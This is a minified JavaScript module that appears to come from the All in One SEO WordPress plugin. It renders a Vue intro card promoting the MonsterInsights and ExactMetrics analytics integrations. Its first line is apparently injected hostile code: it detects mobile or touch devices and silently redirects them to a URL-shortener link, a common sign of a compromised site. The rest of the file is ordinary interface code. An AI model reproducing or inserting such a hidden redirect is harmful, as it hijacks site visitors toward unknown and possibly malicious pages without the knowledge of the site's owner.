(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as L,X as m}from"./app-core.c8323d51.js";import{C as v}from"./Card.9ee06a3e.js";import{S as p}from"./LogoGear.93a225a7.js";import{a as l}from"./Pencil.683baab8.js";import{e as w}from"./em.7625294c.js";import{_ as s,a as _}from"./vendor-other.39e59221.js";import{aq as G,f as u,Q as d,R as h,j as o,i as I,O as f,a0 as r,v as t,U as i,ae as a,M as S}from"./vendor-vue-ui.232c7c36.js";const k=""+window.__aioseoDynamicImportPreload__("images/em-graph-preview.3e66b578.png"),E=""+window.__aioseoDynamicImportPreload__("images/mi-logo.53dc9f6d.png"),P=""+window.__aioseoDynamicImportPreload__("images/mi-graph-preview.10e6c688.png"),B={class:"aioseo-analytics__intro"},b={class:"intro-image"},x=["src"],C={class:"intro-heading"},T={class:"preview-list"},$=["src"],M={class:"intro-image"},D=["src"],H={class:"intro-heading"},O={class:"preview-list"},R=["src"],z={__name:"MiIntro",props:{prefersEm:Boolean,showButton:Boolean},setup(g){const y=L(),e="all-in-one-seo-pack",n={emIntroH:s("The Best Google Analytics Plugin for WordPress",e),emIntroP:_(s("%1$s connects %2$s to Google Analytics, providing a powerful integration. %1$s is a partner of %2$s.",e),"ExactMetrics","AIOSEO"),emIntroLi1:s("Quick & Easy Google Analytics Setup",e),emIntroLi2:s("Google Analytics Dashboard + Real Time Stats",e),emIntroLi3:s("Google Analytics Enhanced Ecommerce Tracking",e),miIntroH:s("The Best Google Analytics Plugin for WordPress",e),miIntroP:_(s("%1$s connects %2$s to Google Analytics, providing a powerful integration. %1$s is a partner of %2$s.",e),"MonsterInsights","AIOSEO"),miIntroLi1:s("Quick & Easy Google Analytics Setup",e),miIntroLi2:s("Google Analytics Dashboard + Real Time Stats",e),miIntroLi3:s("Google Analytics Enhanced Ecommerce Tracking",e),miIntroLi4:s("Universal Tracking for AMP and Instant Articles",e),getStartedGaFree:s("Get Started with Google Analytics for Free",e)};return(F,c)=>{const A=G("base-button");return u(),d(t(v),{class:"aioseo-monsterinsights-intro",slug:"monsterinsights-intro",hideHeader:!0,noSlide:!0,cardClass:{"aioseo-card--intro":!0}},{default:h(()=>[o("div",B,[g.prefersEm?(u(),I(f,{key:0},[o("div",b,[r(t(p)),c[0]||(c[0]=o("span",null,"♥",-1)),o("img",{src:t(m)(t(w)),height:"90",alt:"ExactMetrics"},null,8,x)]),o("h2",C,i(n.emIntroH),1),o("p",null,i(n.emIntroP),1),o("div",T,[o("img",{src:t(m)(t(k)),height:"200",alt:"mi-graph-preview"},null,8,$),o("ul",null,[o("li",null,[r(t(l)),a(" "+i(n.emIntroLi1),1)]),o("li",null,[r(t(l)),a(" "+i(n.emIntroLi2),1)]),o("li",null,[r(t(l)),a(" "+i(n.emIntroLi3),1)])])])],64)):(u(),I(f,{key:1},[o("div",M,[r(t(p)),c[1]||(c[1]=o("span",null,"♥",-1)),o("img",{src:t(m)(t(E)),height:"90",alt:"MonsterInsights"},null,8,D)]),o("h2",H,i(n.miIntroH),1),o("p",null,i(n.miIntroP),1),o("div",O,[o("img",{src:t(m)(t(P)),height:"200",alt:"mi-graph-preview"},null,8,R),o("ul",null,[o("li",null,[r(t(l)),a(" "+i(n.miIntroLi1),1)]),o("li",null,[r(t(l)),a(" "+i(n.miIntroLi2),1)]),o("li",null,[r(t(l)),a(" "+i(n.miIntroLi3),1)]),o("li",null,[r(t(l)),a(" "+i(n.miIntroLi4),1)])])])],64)),g.showButton?(u(),d(A,{key:2,type:"blue",size:"medium",tag:"a",href:t(y).aioseo.urls.aio.monsterinsights},{default:h(()=>[a(i(n.getStartedGaFree),1)]),_:1},8,["href"])):S("",!0)])]),_:1})}}};export{z as _};
